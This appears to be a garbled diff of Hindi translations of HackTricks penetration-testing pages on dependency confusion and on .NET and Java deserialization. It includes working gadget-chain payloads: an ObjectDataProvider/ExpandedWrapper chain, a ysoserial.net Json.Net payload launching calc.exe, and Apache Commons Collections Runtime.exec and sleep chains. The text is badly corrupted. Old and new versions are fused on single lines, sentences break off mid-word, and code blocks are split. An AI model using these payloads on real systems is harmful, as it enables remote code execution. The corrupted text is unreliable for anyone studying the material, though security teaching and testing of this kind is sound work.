सभी मामलों में हमलावर को केवल एक **हानिकारक पैकेज जारी करने की आवश्यकता** होती है जिसका नाम शिकार कंपनी द्वारा उपयोग की जाने वाली पुस्तकालयों का होता है। सभी मामलों में हमलावर को केवल एक **हानिकारक पैकेज का नाम प्रकाशित करने** की आवश्यकता है जिसे पीड़ित कंपनी द्वारा उपयोग किए जाने वाली पुस्तकालयों का नाम है।
{% endhint %} {% endhint %}
### गलत वर्तनी वाला और अस्तित्व नहीं ### गलत वर्णन और अस्तित्व नहीं
यदि आपकी कंपनी को**आंतरिक पुस्तकालय नहीं आयात करने की कोशिश कर रही है**, तो बहुत संभावना है कि पुस्तकालयों का रिपॉजिटरी उसे **सार्वजनिक रिपॉजिटरियों** में खोजने की कोशिश करेगा। यदि किसी हमलावर ने इसे बनाया है, तो आपका कोड और मशीन जो चल रही है, बहुत संभावना है कि संक्रमित हो जाएगा। यदि आपकी कंपनी कोशिश कर रही है कि **आंतरिक नहीं होने वाली पुस्तकालय को आयात करें**, तो संभावना है कि पुस्तकालयों का रिपॉ इसे **सार्वजनिक रिपॉजिटरियों** में खोज रहा होगा। यदि कोई हमलावर ने इसे बनाया है, तो आपका कोड और मशीनें जिन पर चल रही हैं, संभावना है कि कंप्रोमाइज हो जाएगा।
### निर्दिष्ट संस्करण ### निर्दिष्ट संस्करण
डेवलपर्स के लिए बहुत सामान्य है कि वे पुस्तकालय के किसी भी संस्करण को **निर्दिष्ट नहीं** करें, या केवल एक **महत्त्वपूर्ण संस्करण** को निर्दिष्ट करें। फिर, इंटरप्रेटर नवीनतम संस्करण को डाउनलोड करने की कोशिश करेगा जो उन आवश्यकताओं को पूर डेवलपरों के लिए **पुस्तकालय का कोई संस्करण निर्दिष्ट न करना** या केवल एक **महत्वपूर्ण संस्करण** निर्दिष्ट करना बहुत सामान्य है। फिर, अनुप्रेक्षक नवीनतम संस्करण को डाउनलोड करने का प्रयास करेगा जो उन आवश्यकताओं को पूरा करता है।\
यदि पुस्तकालय एक **जानी-मानी बाह्य पुस्तकालय** है (जैसे पायथन `requests`), तो **हमलावर कुछ नहीं कर सकता**, क्योंकि उसे `requests` नाम की पुस्तकालय नहीं बना सकता (यदि वह मूल लेखक है)।\
हालांकि, यदि पुस्तकालय **आंतरिक** है, जैसे इस उदाहरण में `कंपनी-रिक्वेस्ट्स`, अगर **पुस्तकालय रिपॉ** बाहरी संस्करणों की भी **जांच करने की अनुमति देता है**, तो यह सार्वजनिक रूप से उपलब्ध नए संस्करण की खोज करेगा।\
तो यदि **हमलावर जानता है** कि कंपनी `कंपनी-रिक्वेस्ट्स` पुस्तकालय का उपयोग कर रही है **संस्करण 1.0.1** (लघु अपड

View file

@ -1,24 +1,23 @@
# बेसिक .Net डसीरियलाइजेशन (ObjectDataProvider गैजेट, ExpandedWrapper, और Json.Net) # बेसिक .Net डिसीरियलाइजेशन (ObjectDataProvider गैजेट, ExpandedWrapper, और Json.Net)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने क एक्सेस चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **[hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** में PR जमा करके अपने हैकिंग ट्रिक्स साझा करें * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details> </details>
यह पोस्ट **ObjectDataProvider गैजेट को उत्पन्न करने के लिए कैसे उपयोग किया जाता है** ताकि RCE प्राप्त किया जा सके और **Serialization पुस्तकालय Json.Net और xmlSerializer को उस गैजेट के साथ दुरुपयोग कैसे किया जा सकता है** को समझने के लिए है। यह पोस्ट **ObjectDataProvider गैजेट को उत्पन्न करने के लिए कैसे उपयोग किया जाता है** और RCE प्राप्त करने के लिए **Serialization पुस्तकालय Json.Net और xmlSerializer को कैसे दुरुपयोग किया जा सकता है**, को समझने के लिए है।
## ObjectDataProvider गैजेट ## ObjectDataProvider गैजेट
दस्तावेज़ीकरण से: _ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.\ दस्तावेज़ीकरण से: _ObjectDataProvider Class Wraps और एक ऑब्जेक्ट बनाता है जिसे आप एक बाइंडिंग स्रोत के रूप में उपयोग कर सकते हैं_।\
हाँ, यह एक अजीब व्याख्या है, इसलिए चलिए देखते हैं कि इस क्लास में क्या है जो इतना दिलचस्प है: यह क्लास **एक विविध ऑब्जेक्ट** को **रैप** करने की अनुमति देता है, _**MethodParameters**_ का उपयोग करके **विविध पैरामीटर सेट करने** के लिए, और फिर **MethodName का उपयोग करके एक विविध ऑब्जेक्ट घोषित करने के लिए एक विविध फ़ंक्शन को कॉल करने की अनुमति देता है**।\ हाँ, यह एक अजीब व्याख्या है, इसलिए चलिए देखते हैं कि इस क्लास में क्या है जो इतना दिलचस्प है: यह क्लास **एक विषयस्वत ऑब्ज
इसलिए, विविध **ऑब्ज
```java ```java
using System.Windows.Data; using System.Windows.Data;
using System.Diagnostics; using System.Diagnostics;
@ -42,10 +41,7 @@ myODP.MethodName = "Start";
## ExpandedWrapper ## ExpandedWrapper
पिछले एक्सप्लॉइट का उपयोग करते हुए ऐसे मामले होंगे जहां **object** को _**ObjectDataProvider**_ इंस्टेंस के रूप में **डीसीरियलाइज़ किया जाएगा** (उदाहरण के लिए DotNetNuke vuln में, XmlSerializer का उपयोग करके, ऑब्जेक्ट को `GetType` का उपयोग करके डीसीरियलाइज़ किया गया था)। फिर, **जिस ऑब्जेक्ट के पैकेट में बंधा है, उसके बारे में कोई जानकारी नहीं होगी** _ObjectDataProvider_ इंस्टेंस में (`Process` उदाहरण के लिए)। आप [DotNetNuke vuln के बारे में अधिक जानकारी यहाँ](https://translate.google.com/translate?hl=en\&sl=auto\&tl=en\&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F\&sandbox=1) पा सकते हैं। पिछले एक्सप्लॉइट का उपयोग करते हुए ऐसे मामले होंगे जहाँ **ऑब्ज
यह क्लास एक दिए गए इंस्टेंस में बंधे ऑब्जेक्ट के ऑब्जेक्ट टाइप को **निर्दिष्ट करने की अनुमति देता है**। इसलिए, यह क्लास एक स्रोत ऑब्जेक्ट (_ObjectDataProvider_) को एक नए ऑब्जेक्ट टाइप में ढकने और हमें आवश्यक गुण प्रदान करने के लिए उपयोग किया जा सकता है (_ObjectDataProvider.MethodName_ और _ObjectDataProvider.MethodParameters_)।\
यह पिछले प्रस्तुत मामले के लिए बहुत उपयुक्त है, क्योंकि हम **\_ObjectDataProvider**_ को एक _**ExpandedWrapper**_ इंस्टेंस के अंदर **लपेट सकेंगे** और **जब इसे डीसीरियलाइज़** किया जाएगा तो यह क्लास _**MethodName**_ में निर्दिष्ट **कार्य** को **चलाएगा** जो _**OjectDataProvider**_ ऑब्ज
```java ```java
using System.Windows.Data; using System.Windows.Data;
using System.Diagnostics; using System.Diagnostics;
@ -114,7 +110,7 @@ Console.WriteLine(desaccount.Email);
``` ```
### Json.Net का दुरुपयोग ### Json.Net का दुरुपयोग
[ysoserial.net](https://github.com/pwntester/ysoserial.net) का उपयोग करते हुए मैंने यह उत्पीड़न बनाया: [ysoserial.net](https://github.com/pwntester/ysoserial.net) का उपयोग करते हुए मैंने एक उत्पीड़न बनाया:
```java ```java
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe" ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{ {
@ -168,10 +164,10 @@ TypeNameHandling = TypeNameHandling.Auto
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करना चाहते हैं? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके। * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** में PR जमा करके।
</details> </details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान साझा करें।** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details> </details>
## जावा ट्रांसफॉर्मर्स से Rutime exec() ## Java Transformers से Rutime exec()
कई स्थानों पर आप एक जावा डेसीरियलाइज़ेशन पेलोड पाएंगे जो अपाचे कॉमन कलेक्शन्स से ट्रांसफॉर्मर्स का उपयोग करता है, जैसा कि निम्नलिखित है: कई स्थानों पर आप एक जावा डेसीरियलाइज़ेशन पेलोड पा सकते हैं जो अपाचे कॉमन कलेक्शन्स से ट्रांसफॉर्मर्स का उपयोग करता है जैसे निम्नलिखित:
```java ```java
import org.apache.commons.*; import org.apache.commons.*;
import org.apache.commons.collections.*; import org.apache.commons.collections.*;
@ -52,22 +52,22 @@ lazyMap.get("anything");
} }
} }
``` ```
यदि आपको जावा डेसीरियलाइज़ेशन पेलोड के बारे में कुछ भी नहीं पता है तो यह समझना कठिन हो सकता है कि इस कोड के द्वारा कैसे एक कैल्क चलाया जाएगा। अगर आप जावा डिसीरियलाइज़ेशन पेलोड के बारे में कुछ नहीं जानते हैं तो यह कठिन हो सकता है कि यह कोड क्यों कैल्क को निष्पादित करेगा।
सबसे पहले, आपको जानना चाहिए कि जावा में **ट्रांसफॉर्मर** कुछ ऐसा होता है जो एक कक्षा को प्राप्त करता है और उसे एक अलग कक्षा में रूपांतरित करता है सबसे पहले आपको यह जानना चाहिए कि **जावा में ट्रांसफॉर्मर** एक ऐसी चीज है जो **एक क्लास को प्राप्त करती है** और **इसे एक अलग क्लास में रूपांतरित करती है**
इसके अलावा, यह जानना भी दिलचस्प है कि यहां **चलाया जा रहा पेलोड** निम्नलिखित के **समान** है: इसके अलावा यह दिलचस्प है कि यहां **निष्पादित पेलोड** **बराबर** है:
```java ```java
Runtime.getRuntime().exec(new String[]{"calc.exe"}); Runtime.getRuntime().exec(new String[]{"calc.exe"});
``` ```
या **अधिक सटीकता से**, अंत में क्या निष्पादित होगा, वह होगा: या **अधिक सटीकता से**, अंत में क्या निष्पादित होगा:
```java ```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"}); ((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
``` ```
### कैसे ### कैसे
तो, पहले पेलोड को वे "सरल" वन-लाइनर्स के समान कैसे प्रस्तुत किया जाता है? तो, पहले पेलोड को उन "सरल" वन-लाइनर्स के समान कैसे पेश किया गया है?
**पहले** से ही, आप पेलोड में ध्यान दें कि एक **ट्रांसफॉर्म्स की एक श्रृंखला (एरे) बनाई जाती है**: **पहली** बात तो यह है कि पेलोड में एक **ट्रांसफॉर्म का श्रृंखला (एरे) बनाया गया है**:
```java ```java
String[] command = {"calc.exe"}; String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{ final Transformer[] transformers = new Transformer[]{
@ -94,15 +94,15 @@ command
}; };
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
``` ```
यदि आप कोड पढ़ हैं तो आप देखेंगे कि यदि आप किसी भी तरीके से सरणी के परिवर्तन को चेन करते हैं तो आप विचारशील आदेशों को निष्पादित कर सकते हैं। यदि आप कोड पढ़ें तो आप देखेंगे कि यदि आप किसी भी तरह से एरे के परिवर्तनों को श्रृंखलित करते हैं तो आप विविध आदेशों को निष्पादित कर सकते हैं।
तो, **वे परिवर्तन कैसे चेन होते हैं?** तो, **वे परिवर्तन कैसे श्रृंखलित होते हैं?**
```java ```java
Map map = new HashMap<>(); Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer); Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything"); lazyMap.get("anything");
``` ```
उपयोग की गई पेलोड के अंतिम खंड में आप देख सकते हैं कि एक **मानचित्र ऑब्जेक्ट बनाया जाता है**। फिर, `LazyMap` से `decorate` फ़ंक्शन को मानचित्र ऑब्जेक्ट और चेन किए गए ट्रांसफ़ॉर्मर्स के साथ निष्पादित किया जाता है। निम्नलिखित कोड से आप देख सकते हैं कि इससे **चेन किए गए ट्रांसफ़ॉर्मर्स** को `lazyMap.factory` विशेषता के अंदर कॉपी किया जाएगा: आप पेयलोड के अंतिम खंड में देख सकते हैं कि एक **Map object बनाया गया है**। फिर, `decorate` फ़ंक्शन `LazyMap` से मानचित्र ऑब्ज
```java ```java
protected LazyMap(Map map, Transformer factory) { protected LazyMap(Map map, Transformer factory) {
super(map); super(map);
@ -112,7 +112,7 @@ throw new IllegalArgumentException("Factory must not be null");
this.factory = factory; this.factory = factory;
} }
``` ```
और फिर महान समाप्ति को क्रियान्वित किया जाता है: `lazyMap.get("कुछ भी");` और फिर महान अंत को क्रियान्वित किया जाता है: `lazyMap.get("anything");`
यह `get` फ़ंक्शन का कोड है: यह `get` फ़ंक्शन का कोड है:
```java ```java
@ -125,7 +125,7 @@ return value;
return map.get(key); return map.get(key);
} }
``` ```
और यह `transform` फ़ंक्शन का कोड है और यह `transform` फ़ंक्शन का कोड है
```java ```java
public Object transform(Object object) { public Object transform(Object object) {
for (int i = 0; i < iTransformers.length; i++) { for (int i = 0; i < iTransformers.length; i++) {
@ -134,11 +134,7 @@ object = iTransformers[i].transform(object);
return object; return object;
} }
``` ```
तो, याद रखें कि हमने **फैक्ट्री** के अंदर **`chainedTransformer`** को सहेज रखा था और **`transform`** फ़ंक्शन के अंदर हम **सभी उन ट्रांसफ़ॉर्मर्स के माध्यम से जा रहे हैं** और एक के बाद एक को निष्पादित कर रहे हैं। मजेदार बात यह है कि **प्रत्येक ट्रांसफ़ॉर्मर `object` का उपयोग कर रहा है** और **ऑब्जेक्ट पिछले ट्रांसफ़ॉर्मर द्वारा निष्पादित होने वाला आउटपुट है**। इसलिए, **सभी ट्रांसफ़ॉर्म्स एक साथ चल रहे हैं और खतरनाक पेलोड को निष्पादित कर रहे हैं** इसलिए, याद रखें कि **फैक्टरी** के अंदर हमने **`chainedTransformer`** को सहेजा था और **`transform`** फ़ंक्शन के अंदर हम **सभी उन ट्रांसफ़ॉर्मर्स के माध्यम से जा रहे हैं जो एक के बाद एक चेन किए गए हैं** और एक के बाद एक को क्रियान्वित कर रहे हैं। मजेदार बात यह है कि **प्रत्येक ट्रांसफ़ॉर्मर `object` का उपयोग कर रहा है** और **ऑब्ज
### सारांश
अंत में, lazyMap द्वारा चेन्ड ट्रांसफ़ॉर्मर्स को get मेथड के अंदर कैसे प्रबंधित किया जाता है, ऐसा लगता है जैसे हम निम्नलिखित कोड को निष्पादित कर रहे हों:
```java ```java
Object value = "someting"; Object value = "someting";
@ -159,15 +155,15 @@ new Class[]{String.class},
command command
).transform(value); //(4) ).transform(value); //(4)
``` ```
_ध्यान दें कि `value` प्रत्येक ट्रांसफॉर्म का इनपुट है और पिछले ट्रांसफॉर्म का आउटपुट है, जो एक-लाइनर का निष्पादन संभव बनाता है:_ _ध्यान दें कि `value` प्रत्येक transform का इनपुट है और पिछले transform का आउटपुट है, जिससे एक-लाइनर का निष्पादन संभव होता है:_
```java ```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"}); ((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
``` ```
नोट करें कि यहां **गैजेट्स की व्याख्या की गई थी** जो **ComonsCollections1** पेलोड के लिए उपयोग की जाती है। लेकिन यह छोड़ दिया गया है कि **इसका आरंभ कैसे होता है**। आप यहां देख सकते हैं [यहां कि **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), इस पेलोड को निष्पादित करने के लिए, एक `AnnotationInvocationHandler` ऑब्जेक्ट का उपयोग करता है क्योंकि **जब इस ऑब्जेक्ट को डिसीरियलाइज किया जाता है**, यह **पेलोड को पुनः निष्पादित करेगा** ध्यान दें कि यहाँ **उन गैजेट्स की व्याख्या की गई थी** जो **ComonsCollections1** पेलोड के लिए उपयोग किए गए थे। लेकिन यह **बचा है कि यह सब कैसे आरंभ होता है**। आप यहाँ देख सकते हैं [यहाँ कि **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), इस पेलोड को निष्पादित करने के लिए, एक `AnnotationInvocationHandler` ऑब्जेक्ट का उपयोग करता है क्योंकि **जब इस ऑब्जेक्ट को डीसीरियलाइज़ किया जाता है**, तो यह `payload.get()` फ़ंक्शन को **आमंत्रित** करेगा जो पूरे पेलोड को **निष्पादित** करेगा
## जावा थ्रेड स्लीप ## जावा थ्रेड स्लीप
यह पेलोड **उपयोगी हो सकता है ताकि पता लगा सके कि क्या वेब कमजोर है क्योंकि यदि हां तो यह एक स्लीप निष्पादित करेगा**। यह पेलोड **हैंडी हो सकता है ताकि पता लगाया जा सके कि क्या वेब कमजोर है क्योंकि यह एक स्लीप को निष्पादित करेगा अगर यह है**।
```java ```java
import org.apache.commons.*; import org.apache.commons.*;
import org.apache.commons.collections.*; import org.apache.commons.collections.*;
@ -210,7 +206,7 @@ lazyMap.get("anything");
} }
} }
``` ```
## अधिक गैजेट्स ## अधिक गैजेट
आप यहाँ अधिक गैजेट्स पा सकते हैं: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html) आप यहाँ अधिक गैजेट्स पा सकते हैं: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
@ -220,10 +216,10 @@ lazyMap.get("anything");
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>

View file

@ -1,27 +1,27 @@
# PDF अपलोड - XXE और CORS बापास # PDF अपलोड - XXE और CORS बापास
<details> <details>
